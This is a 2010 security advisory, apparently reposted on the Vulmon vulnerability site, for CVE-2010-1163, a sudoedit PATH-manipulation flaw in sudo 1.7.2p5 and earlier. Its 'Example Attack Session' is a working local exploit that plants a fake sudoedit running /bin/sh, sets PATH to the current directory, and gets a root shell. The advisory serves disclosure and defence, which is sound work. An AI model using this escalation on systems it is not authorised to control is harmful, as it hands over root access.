Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Sudo 1.7.2p5 Local Privilege Escalation

Related Vulnerabilities: CVE-2010-1163   CVE-2010-0426  
Publish Date: 20 Apr 2010
Author: Maurizio Agazzini, Valerio Costamagna, lab.mediaservice.net
Source 
                							

                Security Advisory           @ Mediaservice.net Srl
(#02, 19/04/2010)          Data Security Division

         Title:  sudoedit local privilege escalation through PATH manipulation
   Application:  sudo <= 1.7.2p5
      Platform:  Linux, maybe others
   Description:  A local user with permission to run the sudoedit pseudo-command 
    can gain root privileges, through manipulation of the PATH 
    environment variable.
       Authors:  Valerio Costamagna <sid@mediaservice.net>
                Maurizio Agazzini <inode@mediaservice.net>
 Vendor Status: sudo team notified on 26/03/2010
 CVE Candidate: The Common Vulnerabilities and Exposures project has assigned
    the name CVE-2010-1163 to this issue.
    References: http://lab.mediaservice.net/advisory/2010-02-sudo.txt
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1163
    http://www.sudo.ws/sudo/alerts/sudoedit_escalate2.html

1. Abstract.

While writing an article about the vulnerability outlined in CVE-2010-0426, we
found a distinct security flaw, also related to the sudoedit pseudo-command.
Specifically, the path component of sudoedit is not checked correctly. This 
can be easily exploited by a local user with permission to run sudoedit, in 
order to execute arbitrary commands as root.

2. Example Attack Session.

inode@pandora:~$ echo "/bin/sh" > sudoedit
inode@pandora:~$ /usr/bin/chmod +x sudoedit
inode@pandora:~$ id
uid=1000(inode) gid=100(users) groups=100(users)
inode@pandora:~$ export PATH=.
inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts
Password:
sh-3.1# /usr/bin/id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),
10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev),84(power),
86(netdev),93(scanner)
sh-3.1#

3. Affected Platforms.

All vendors supporting sudo <= 1.7.2p5 are affected. Exploitation of this
vulnerability requires that the /etc/sudoers file be configured to allow the
attacker to run sudoedit.

4. Fix.

On April 9th 2010, version 1.7.2p6 has been relased by the sudo team, which
fixes the described vulnerability.

5. Proof Of Concept.

See Example Attack Session above.

Copyright (c) 2010 @ Mediaservice.net Srl. All rights reserved.
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started